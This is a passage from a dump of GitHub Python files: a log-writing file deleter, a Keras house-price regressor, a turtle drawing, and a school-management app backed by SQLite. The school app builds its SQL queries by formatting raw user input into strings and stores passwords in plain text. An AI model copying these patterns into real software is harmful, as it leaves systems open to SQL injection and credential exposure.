SCIEZKE DLA PLIKOW\nlogArchive_file = 'archive_log.txt'\nfile_name = \"Data.xml\"\nwslNames = []\n\n# create/open or open the log file\nif (os.path.isfile(logArchive_file)) == False:\n logFile = open(logArchive_file, 'w')\nelse:\n logFile = open(logArchive_file, 'a')\n\n# get system_datetime and write to log file\nDateToHelpDeleter = int(datetime.datetime.now().strftime(\"%Y%m%d\"))\nnow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\nlogFile.write('------ Start ' + str(now) + '\\n')\n\n# parse xml config file\ndom = ElementTree.parse(file_name)\nwslTree = dom.findall(\"Wholesaler\")\nretTree = dom.findall(\"Retension\")\n\n# find all Wholesalers in the config file\nfor wTree in wslTree:\n wsls = wTree.findall(\"wsl\")\n for wsl in wsls:\n finalWslName = wsl.text\n wslNames.append(finalWslName)\n\n# find how many rete in the config file\nfor rTree in retTree:\n rT = rTree.findall(\"daily\")\n for ff in rT:\n finalDailyRet = int(ff.text)\n tR = rTree.findall(\"monthly\")\n for hh in tR:\n finalMonthlyRet = int(hh.text)\n\n# run check/delete files according to the parameters\nfor wslName in wslNames:\n checkFiles(ftpRootCatalogue, wslName)\n\nlogFile.write('------ End' + '\\n\\n')\nlogFile.close()","repo_name":"plelewski/Others","sub_path":"FilesDeleter/Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"75024750927","text":"#!/usr/bin/env python3\n\n__author__ = \"Yxzh\"\n\nimport numpy as np\nfrom tensorflow import keras\nimport pandas as pd\n\n\ncsv_loader = pd.read_csv(\"data/housing.csv\", delim_whitespace = True, header = None)\nsamples = np.array(csv_loader)[:, 0: 13]\nlabels = np.array(csv_loader)[:, 13: 14]\n\nprint(samples, labels)\nmodel = keras.Sequential()\nmodel.add(keras.layers.Dense(13, input_dim = 13, kernel_initializer = 'normal', activation = 'relu'))\nmodel.add(keras.layers.Dense(7, kernel_initializer = 'normal', activation = 'relu'))\nmodel.add(keras.layers.Dense(3, kernel_initializer = 'normal', activation = 'relu'))\nmodel.add(keras.layers.Dense(1, kernel_initializer = 'normal'))\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\n\nmodel.fit(samples, labels, 4, epochs = 200)\n\nmodel.save(\"model/housing.h5\")\n\nprint(\n\tmodel.predict(np.array([[0.00632, 18.00, 2.310, 0, 0.5380, 6.5750, 65.20, 4.0900, 1, 296.0, 15.30, 396.90, 4.98]])))\nprint(\n\tmodel.predict(np.array([[0.02731, 0.00, 7.070, 0, 0.4690, 6.4210, 78.90, 4.9671, 2, 242.0, 17.80, 396.90, 9.14]])))\nprint(\n\tmodel.predict(np.array([[0.02729, 0.00, 7.070, 0, 0.4690, 7.1850, 61.10, 4.9671, 2, 242.0, 17.80, 392.83, 4.03]]))\n)\n","repo_name":"cstrikest/ML_study","sub_path":"House_Price_keras.py","file_name":"House_Price_keras.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"6261022402","text":"# a115_buggy_image.py\r\nimport turtle as trtl\r\n\r\nspider = trtl.Turtle()\r\n# create spider head + body\r\nspider.pensize(40)\r\nspider.circle(20)\r\n# configure spider legs\r\nlegs = 8\r\nlength_legs = 80\r\nspider_angle = 360 / legs \r\nspider.pensize(5)\r\nlegs_loop = 0\r\n# draw spider legs\r\nwhile (legs_loop < legs):\r\n spider.goto(0,20)\r\n spider.setheading(spider_angle*legs_loop)\r\n spider.forward(length_legs)\r\n legs_loop = legs_loop + 1\r\nspider.up()\r\nspider.goto (0,60)\r\nspider.down()\r\nspider.begin_fill()\r\nspider.circle(20)\r\nspider.end_fill()\r\n\r\n\r\n\r\nspider.hideturtle()\r\nwn = trtl.Screen()\r\nwn.mainloop()","repo_name":"riley-csp-2019-20/1-1-5-buggy-code-mileswieczorek","sub_path":"115MilesWieczorek.py","file_name":"115MilesWieczorek.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"20644506130","text":"import ui\nimport assignment\nimport submission\nimport datetime\nimport attendance\nimport sqlite3\n\n\nclass User:\n \"\"\"\n Base class creates user object\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize user object\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n self._id = _id\n self.name = self.check_if_correct(name, str)\n self.surname = self.check_if_correct(surname, str)\n self.check_gender(gender)\n self.gender = gender\n self.date_validate(birth_date)\n self.birth_date = birth_date\n self.email = email\n self.login = login\n self.password = self.check_if_correct(password, str)\n\n @staticmethod\n def check_if_correct(validate, check_type):\n \"\"\"\n Checks if variable is expected type and convert it to integer type if it contains just digits\n\n Args:\n validate: variable to check\n check_type: expected type of variable\n\n Returns:\n validated variable\n \"\"\"\n if type(validate) != check_type:\n raise TypeError(\"Wrong format for: \" + str(validate))\n elif type(validate) == check_type:\n if validate.isdigit():\n validate = int(validate)\n return validate\n elif all(i.isalpha() or i.isspace() for i in validate):\n return validate\n else:\n raise TypeError(\"Wrong format for: \" + str(validate))\n\n def check_gender(self, gender):\n \"\"\"\n Checks if variable is correct type of gender, if not - it raises an error\n\n Args:\n gender: variable to check\n\n Returns:\n None\n \"\"\"\n gender_list = ['male', 'female', 'not sure']\n if gender.lower() not in gender_list:\n raise NameError('Gender should be: male, female, not sure')\n\n def date_validate(self, birth_date):\n \"\"\"\n Checks if data format is correct\n\n Args:\n birth_date: variable to check\n\n Returns:\n True if data format is correct\n \"\"\"\n if datetime.datetime.strptime(birth_date, '%Y-%m-%d').strftime('%Y-%m-%d'):\n return True\n\n\nclass Employee(User):\n \"\"\"Class creates object employee\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize employee object that inherits from User class\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n\n def list_students(self):\n \"\"\"\n Return student list to display\n\n Returns:\n student list\n \"\"\"\n student_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='student'\")\n students = cursor.fetchall()\n n = 1\n for student in students:\n student_list.append([str(n) + \".\", student[1], student[2]])\n n += 1\n data.close()\n return student_list\n\n\n def list_students_simple_view(self):\n \"\"\"\n Return student list to display\n\n Returns:\n student list\n \"\"\"\n student_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='student'\")\n students = cursor.fetchall()\n for student in students:\n student_list.append([student[0], student[1], student[2]])\n data.close()\n return student_list\n\n def view_student_details(self):\n \"\"\"\n Returns students details list to display\n\n Returns:\n\n student detail list\n \"\"\"\n\n student_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='student'\")\n students = cursor.fetchall()\n n = 1\n for student in students:\n student_list.append([str(n) + \".\", student[1], student[2], student[3],\n student[4], student[5], student[6], student[7]])\n n += 1\n data.close()\n return student_list\n\n\nclass Student(User):\n \"\"\"Class creates object student\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize student object that inherits from User class\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n self.my_submissions_list = []\n\n def __str__(self):\n return self.name+self.surname\n\n def view_my_grades(self):\n \"\"\"\n Method display list of submitted assignment with grades\n\n Return:\n table submitted assignment with grades\n\n \"\"\"\n grades_for_view = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT assignment.name, submission.grade FROM assignment INNER JOIN submission \"\n \"ON submission.ID_assignment = assignment.ID WHERE ID_Student='{}'\".format(self._id))\n grades = cursor.fetchall()\n n = 1\n for grade in grades:\n grades_for_view.append([str(n) + \".\", grade[0], grade[1]])\n n += 1\n data.commit()\n data.close()\n return grades_for_view\n\n def list_submissions(self): #to refactor - move to class submission as class method\n \"\"\"\n Method returns list of all student submission\n\n Return:\n list submitted assignment\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"select ID_Assignment from `Submission` WHERE ID_Student='{}'\".format(self._id))\n submissions = cursor.fetchall()\n submissions_list = []\n for element in submissions:\n submissions_list.append(element[0])\n data.close()\n return submissions_list\n\n def list_assignments_to_submit(self): #to refactor - move to class submission as class method\n \"\"\"\n Method returns list of all student submission\n\n Return:\n list not submitted assignment\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT ID, Name, Type, Delivery_date FROM `Assignment`\")\n assignments = cursor.fetchall()\n assignments_to_submit = []\n for assignment in assignments:\n if assignment[0] not in self.list_submissions():\n assignments_to_submit.append(list(assignment))\n data.close()\n return assignments_to_submit\n\n def submit_assignment(self, assignment):\n \"\"\"\n Method allows student to submit assignment\n\n Args:\n assignment\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n if len(assignment) <= 1:\n print(\"You have no assignment to submitt!\")\n return\n assignment_id = ui.Ui.get_inputs([\"\"], \"Enter number to choose assignment to submit: \")\n # if assignment_id not in assignment or assignment_id <= 0:\n # print(\"Try again with right index!\")\n # return\n result = ui.Ui.get_inputs([\"Content\"], \"Provide information about new assignment\")\n submission_date = datetime.date.today()\n cursor.execute(\"INSERT INTO `Submission` (`ID_Student`, `ID_Assignment`,`Result`, `Submittion_date`) \"\n \"VALUES ('{}', '{}', '{}', '{}')\".format(self._id, assignment_id[0], result[0], submission_date))\n data.commit()\n data.close()\n\n def list_group_assignment(self):\n \"\"\"\n Method returns list of all group submission\n\n Return:\n list assignment for group\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT ID, Name, Type, Delivery_date FROM `Assignment` WHERE Type='group'\")\n group_assignments = cursor.fetchall()\n group_assignments_list = []\n for assignment in group_assignments:\n group_assignments_list.append([assignment[0], assignment[1], assignment[2], assignment[3]])\n data.commit()\n data.close()\n return group_assignments_list\n\n def find_student_team(self):\n \"\"\"\n Method returns team name for logged student\n\n Return:\n team name as list\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT team_name FROM `Teams` WHERE ID_Student='{}'\".format(self._id))\n teams = cursor.fetchall()\n data.commit()\n data.close()\n return teams[0][0]\n\n def find_students_teammates(self, team):\n \"\"\"\n Method returns all students from the same team\n\n Return:\n list student teammates\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT Id_Student FROM `Teams` WHERE Team_name='{}'\".format(team))\n teammates = cursor.fetchall()\n teammates_list = []\n for mate in teammates:\n teammates_list.append(mate[0])\n data.commit()\n data.close()\n return teammates_list\n\n def add_group_assignment(self, teammates, group_submission):\n \"\"\"\n Method allows student to submit assignment for each team member\n\n Args:\n teammates, group_submission\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n if len(group_submission) <= 1:\n print(\"You have no assignment to submitt!\")\n return\n assignment_id = ui.Ui.get_inputs([\"\"], \"Enter number to choose assignment to submit: \")\n result = ui.Ui.get_inputs([\"Content\"], \"Provide information about new assignment\")\n submission_date = datetime.date.today()\n for row in teammates:\n cursor.execute(\"INSERT INTO `Submission` (`ID_Student`, `ID_Assignment`,`Result`, `Submittion_date`) \"\n \"VALUES ('{}', '{}', '{}', '{}')\".format(row, assignment_id[0], result[0], submission_date))\n data.commit()\n data.close()\n\n def check_my_attendance(self):\n \"\"\"\n Method allows student to check attendance level in %\n\n Return:\n percent of attendance\n\n \"\"\"\n student_id = self._id\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT COUNT(Presence) FROM `Attendance` WHERE ID_Student='{}'\"\n \"AND `Presence`= 0\".format(student_id))\n presence = cursor.fetchall()\n number_of_presence = float(presence[0][0])\n cursor.execute(\"SELECT COUNT(Presence) FROM `Attendance`\")\n number_of_days = cursor.fetchall()\n days = float(number_of_days[0][0])\n if days == 0:\n print(\"No attendance!\")\n return\n # TODO: new validation\n percent_of_attendance = (number_of_presence / days) * 100\n percent_of_attendance_list =[]\n percent_of_attendance_list.append([percent_of_attendance])\n data.commit()\n data.close()\n return percent_of_attendance_list\n\n\nclass Mentor(Employee):\n \"\"\"Class creates object mentor\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize mentor object that inherits from User class\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n\n def add_student(self):\n \"\"\"\n Method allows mentor to add student to students list\n\n Args:\n None\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Provide information about new student\")\n\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('Data should have format: YYYY-MM-DD')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData format: YYYY-MM-DD\\n')\n return\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"INSERT INTO `User` (`name`, `surname`, `gender`, `birth_date`, `email`, `login`, `password`, `user_type`) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}')\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], \"student\"))\n data.commit()\n data.close()\n print(\"Student was added.\")\n\n def check_attendance(self):\n \"\"\"\n Method allows mentor check students attendance\n\n Args:\n None\n Return:\n None\n \"\"\"\n students_list = []\n ids = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT id, name, surname FROM user WHERE User_type='student'\")\n students = cursor.fetchall()\n for student in students:\n students_list.append(student[1]+\" \"+student[2])\n ids.append(student[0])\n presences = ui.Ui.get_inputs(students_list, \"Starting attendance check (mark 0 for absence, 1 for present)\")\n i = 0\n for presence in presences:\n cursor.execute(\"INSERT INTO attendance (ID_Student, Date, Presence) VALUES ('{}', '{}', '{}')\"\n .format(ids[i], str(datetime.date.today()), presence))\n i += 1\n data.commit()\n data.close()\n print(\"Checking attendance finished\")\n\n\n def remove_student(self):\n \"\"\"\n Method allows mentor remove students from students list\n\n Args:\n None\n Return:\n None\n \"\"\"\n self.list_students()\n options = ui.Ui.get_inputs([\"\"], \"Enter number to erase student from database: \")\n if int(options[0]) < 0 or int(options[0]) > len(self.list_students()):\n print(\"There is no such student number on the list\")\n return\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `user` WHERE `user_type`='student'\")\n students = cursor.fetchall()\n student_to_erase_name = students[int(options[0])-1][1]\n student_to_erase_surname = students[int(options[0])-1][2]\n print(student_to_erase_name, student_to_erase_surname)\n cursor.execute(\"DELETE FROM `User` WHERE `name`='{}' AND `surname`='{}'\"\n .format(student_to_erase_name, student_to_erase_surname))\n data.commit()\n data.close()\n print(\"Student was erased.\")\n\n\n def edit_student(self):\n \"\"\"\n Method allows mentor edit students specific data\n\n Args:\n None\n Return:\n None\n \"\"\"\n self.list_students()\n choosed_student = ui.Ui.get_inputs([\"\"], \"Enter number to edit student's data\")\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Edit information about student\")\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('Data should have format: YYYY-MM-DD')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData format: YYYY-MM-DD\\n')\n return\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `user` WHERE `user_type`='student'\")\n students = cursor.fetchall()\n student_to_edit_name = students[int(choosed_student[0]) - 1][1]\n student_to_edit_surname = students[int(choosed_student[0]) - 1][2]\n\n cursor.execute(\n \"UPDATE `User` SET `name`='{}', `surname`='{}', `gender`='{}', `birth_date`='{}', `email`='{}', `login`='{}', `password`='{}' \"\n \" WHERE \"\n \"`name`='{}' AND `surname`='{}'\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], student_to_edit_name, student_to_edit_surname))\n data.commit()\n data.close()\n print(\"Update completed\")\n\n def show_submissions_to_grade(self):\n \"\"\"\n Method allows mentor show submissions to grade\n\n Args:\n None\n Return:\n List of lists with submissions to grade\n \"\"\"\n return_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n submissions_not_graded = cursor.execute(\n\"SELECT Assignment.ID, Assignment.Name, Assignment.delivery_date, User.Name, User.Surname, Submission.Submittion_date \"\n\"FROM Submission \"\n\"INNER JOIN Assignment ON Assignment.ID=Submission.ID \"\n\"INNER JOIN User ON user.ID=Submission.ID_Student \"\n\"WHERE Submission.Grade IS NULL OR Submission.Grade=''\").fetchall()\n if len(submissions_not_graded) == 0:\n print(\"No submissions to grade\")\n return None\n for submission in submissions_not_graded:\n return_list.append([submission[0], submission[1], submission[2],\n submission[3], submission[4], submission[5]])\n data.close()\n return return_list\n\n def grade_submission(self):\n \"\"\"\n Method allows mentor grade students submitted assignment\n\n Args:\n None\n Return:\n None\n \"\"\"\n id_assignment_to_grade = ui.Ui.get_inputs([\"\"], \"Choose assignment to grade\")\n grade = ui.Ui.get_inputs([\"\"], \"Enter grade for assignment\")\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"UPDATE Submission SET Grade={} WHERE ID={}\".format(grade[0], int(id_assignment_to_grade[0])))\n print(\"Submission graded\")\n data.commit()\n data.close()\n\n def add_assignment(self):\n \"\"\"\n Method allows mentor add new assignment\n\n Args:\n None\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"Name\", \"Type\", \"Max. points to receive\", \"Delivery date\", \"Content\"],\n \"Provide information about new assignment\")\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\n \"INSERT INTO `assignment` (`name`, `type`, `max_points`, `delivery_date`, `content`) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}')\"\n .format(options[0], options[1], options[2], options[3],\n options[4]))\n data.commit()\n data.close()\n print(\"Assignment was added.\")\n\n def list_teams(self):\n \"\"\"\n Method allows mentor to list teams\n\n Args:\n None\n Return:\n None\n \"\"\"\n team_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT user.id, team_name, name, surname FROM teams \"\n \"INNER JOIN user ON teams.id_student=user.id ORDER BY team_name\")\n teams = cursor.fetchall()\n for team in teams:\n team_list.append([team[0], team[1], team[2], team[3]])\n data.close()\n return team_list\n\n def add_team(self):\n choosed_student_and_team = ui.Ui.get_inputs([\"Enter number to add student to team: \", \"Team name for student: \"], \"\")\n student_to_add_id = int(choosed_student_and_team[0]) # id student to add to team\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n\n cursor.execute(\"SELECT * FROM teams WHERE ID_Student='{}'\".format(student_to_add_id)) # check if student already is in team\n team_row = cursor.fetchone()\n if team_row:\n cursor.execute(\"DELETE FROM teams WHERE ID_Student='{}'\"\n .format(student_to_add_id))\n\n cursor.execute(\"INSERT INTO teams (ID_Student, Team_name) VALUES ('{}', '{}')\"\n .format(student_to_add_id, choosed_student_and_team[1]))\n data.commit()\n data.close()\n print(\"Team updated.\")\n\n\n def list_checkpoint_assignments(self):\n \"\"\"\n Method allows mentor to list checkpoint assignments\n\n Args:\n None\n Return:\n None\n \"\"\"\n checkpoint_assignments_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM Checkpoint_assignment\")\n assignments = cursor.fetchall()\n n = 1\n for assignment in assignments:\n if assignment[2] == None:\n checkpoint_assignments_list.append([str(n) + \".\", assignment[1], ''])\n\n else:\n checkpoint_assignments_list.append([str(n) + \".\", assignment[1], assignment[2]])\n n += 1\n data.close()\n return checkpoint_assignments_list\n\n def get_checkpoint_id(self):\n \"\"\"\n Returns id of checkpoint\n\n Args:\n None\n Return:\n id of checkpoint\n \"\"\"\n choosed_checkpoint = ui.Ui.get_inputs([\"\"], \"Choose checkpoint to grade student\")\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM Checkpoint_assignment\")\n checkpoint = cursor.fetchall()\n checkpoint_id = checkpoint[int(choosed_checkpoint[0]) - 1][0]\n data.close()\n return checkpoint_id\n\n def add_checkpoint_submission(self, checkpoint_assignment_id):\n \"\"\"\n Method allows mentor to add cards to particular student\n\n Args:\n checkpoint_assignment_id: id of particular assignment\n Return:\n None\n \"\"\"\n choosed_student = ui.Ui.get_inputs([\"\"], \"Choose student to add checkpoint results\")\n student_to_add_id = int(choosed_student[0])\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n card = ui.Ui.get_inputs([\"\"], \"Choose card to add (Enter to not assign)\")\n\n cursor.execute(\"SELECT * FROM Checkpoint_submittion \"\n \"WHERE ID_Student='{}' AND ID_Assignment='{}'\"\n .format(student_to_add_id, checkpoint_assignment_id))\n\n _data = cursor.fetchone()\n if _data is None:\n cursor.execute(\"INSERT INTO Checkpoint_submittion (ID_Student, Date, Card, ID_Mentor, ID_Assignment) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}')\"\n .format(student_to_add_id, datetime.date.today(), card[0], self._id, checkpoint_assignment_id))\n data.commit()\n print(\"Checkpoint submission added.\")\n else:\n print(\"Checkpoint already graded.\")\n data.close()\n\n def check_student_performance(self):\n \"\"\"\n Method allows mentor to check performance of particular student by showing hes statistics\n\n Args:\n None\n Return:\n None\n \"\"\"\n return_list = []\n choosed_student = ui.Ui.get_inputs([\"\"], \"Choose student to check hes performance\")\n student_to_check_id = int(choosed_student[0])\n period = ui.Ui.get_inputs([\"Date from\", \"Date to\"], \"Enter dates for performance check\")\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT name, surname FROM user where ID={}\".format(student_to_check_id))\n _data = cursor.fetchone()\n student_name = _data[0]\n student_surname = _data[1]\n\n cursor.execute(\"SELECT * FROM attendance where id_student={} AND date BETWEEN '{}' AND '{}'\"\n .format(student_to_check_id, period[0], period[1]))\n _data = cursor.fetchall()\n all_days = 0\n days_in_school = 0\n for item in _data:\n all_days += 1\n if item[3] == \"1\":\n days_in_school += 1\n avg_days = round(days_in_school/all_days, 2)\n\n cursor.execute(\"SELECT Grade FROM Submission where id_student={} AND Submittion_date BETWEEN '{}' AND '{}'\"\n .format(student_to_check_id, period[0], period[1]))\n _data = cursor.fetchall()\n grades_quantity = 0\n grades_sum = 0\n for item in _data:\n grades_quantity += 1\n grades_sum += item[0]\n if grades_quantity:\n grades_avg = round(grades_sum/grades_quantity, 2)\n else:\n grades_avg = 0\n\n cursor.execute(\"SELECT Card FROM Checkpoint_submittion where id_student={} AND date BETWEEN '{}' AND '{}'\"\n .format(student_to_check_id, period[0], period[1]))\n _data = cursor.fetchall()\n yellow_cards = 0\n red_cards = 0\n for item in _data:\n if item[0] == \"yellow\":\n yellow_cards += 1\n elif item[0] == \"red\":\n red_cards += 1\n\n return_list.append([student_name, student_surname, avg_days,\n grades_avg, yellow_cards, red_cards])\n data.close()\n return return_list\n\n\nclass Manager(Employee):\n \"\"\"Class creates object mentor\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize mentor object that inherits from User class\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n\n @staticmethod\n def add_mentor():\n \"\"\"\n Method allows manager to add mentor to mentors list\n\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Provide information about new mentor\")\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('\\nData should have format: YYYY-MM-DD\\n')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData should have format: YYYY-MM-DD\\n')\n return\n\n # new_mentor = Mentor(options[0], options[1], options[2], options[3], options[4], options[5],\n # options[6])\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"INSERT INTO `User`(Name, Surname, Gender, Birth_date, Email, Login, Password, User_type) \"\n \"VALUES ('{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}')\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], \"mentor\"))\n data.commit()\n data.close()\n print(\"Mentor was added.\")\n\n @staticmethod\n def remove_mentor():\n \"\"\"\n Method allows manager to remove mentor from mentors list\n\n Return:\n None\n \"\"\"\n options = ui.Ui.get_inputs([\"\"], \"Enter number to erase mentor from database\")\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n records = cursor.execute(\"SELECT COUNT(`Name`) FROM `User` WHERE `User_Type` = 'mentor'\")\n records = records.fetchall()\n number_of_records = int(records[0][0])\n\n if int(options[0]) < 0 or int(options[0]) > number_of_records-1:\n print(\"There is no such mentor number on the list\")\n return\n\n\n cursor.execute(\"SELECT * FROM `User` WHERE `User_type`='mentor'\")\n mentors = cursor.fetchall()\n mentor_name = mentors[int(options[0]) - 1][1]\n mentor_surname = mentors[int(options[0]) - 1][2]\n cursor.execute(\"DELETE FROM `User` WHERE `Name`='{}' AND `Surname`='{}'\"\n .format(mentor_name, mentor_surname))\n data.commit()\n data.close()\n print(\"Mentor was erased.\")\n\n @staticmethod\n def edit_mentor():\n \"\"\"\n Method allows manager to edit mentor specific data\n\n Return:\n None\n \"\"\"\n\n mentor_to_update = ui.Ui.get_inputs([\"\"], \"Enter number to edit mentor's data\")\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n records = cursor.execute(\"SELECT COUNT(`Name`) FROM `User` WHERE `User_Type` = 'mentor'\")\n records = records.fetchall()\n number_of_records = int(records[0][0])\n\n if int(mentor_to_update[0]) < 1 or int(mentor_to_update[0]) > number_of_records-1:\n print(\"There is no such mentor number on the list\")\n return\n options = ui.Ui.get_inputs([\"Name\", \"Surname\", \"Gender\", \"Birth date\", \"Email\", \"Login\",\n \"Password\"], \"Edit information about student\")\n if options[0].isalpha() and options[1].isalpha() and options[2] in ['male', 'female', 'not sure']:\n if options[3].isalpha():\n print('Data should have format: YYYY-MM-DD')\n return\n else:\n print('\\nWrong input!\\nName: only letters\\nSurname: only letters\\n'\n 'Gender: you can choose only male, female or not sure\\nData format: YYYY-MM-DD\\n')\n return\n\n cursor.execute(\"SELECT * FROM `User` WHERE `User_type`='mentor'\")\n mentors = cursor.fetchall()\n mentor_to_update_name = mentors[int(mentor_to_update[0]) - 1][1]\n mentor_to_update_surname = mentors[int(mentor_to_update[0]) - 1][2]\n\n cursor.execute(\n \"UPDATE `User` SET `Name`='{}', `Surname`='{}', `Gender`='{}', `Birth_date`='{}',\"\n \" `Email`='{}', `Login`='{}', `Password`='{}' \"\n \" WHERE \"\n \"`Name`='{}' AND `Surname`='{}'\"\n .format(options[0], options[1], options[2], options[3],\n options[4], options[5], options[6], mentor_to_update_name, mentor_to_update_surname ))\n data.commit()\n data.close()\n print(\"Update completed\")\n\n @staticmethod\n def list_mentors():\n \"\"\"\n Method allows manager to list all mentor from list\n\n Return:\n mentor_list\n \"\"\"\n mentor_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='mentor'\")\n mentors = cursor.fetchall()\n n = 1\n for mentor in mentors:\n mentor_list.append([str(n) + \".\", mentor[1], mentor[2]])\n n += 1\n data.commit()\n data.close()\n return mentor_list\n\n @staticmethod\n def view_mentors_details():\n \"\"\"\n Returns mentors details list to display\n\n Returns:\n\n student detail list\n \"\"\"\n mentors_details_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='mentor'\")\n mentors = cursor.fetchall()\n n = 1\n for mentor in mentors:\n mentors_details_list.append([str(n) + \".\", mentor[1], mentor[2], 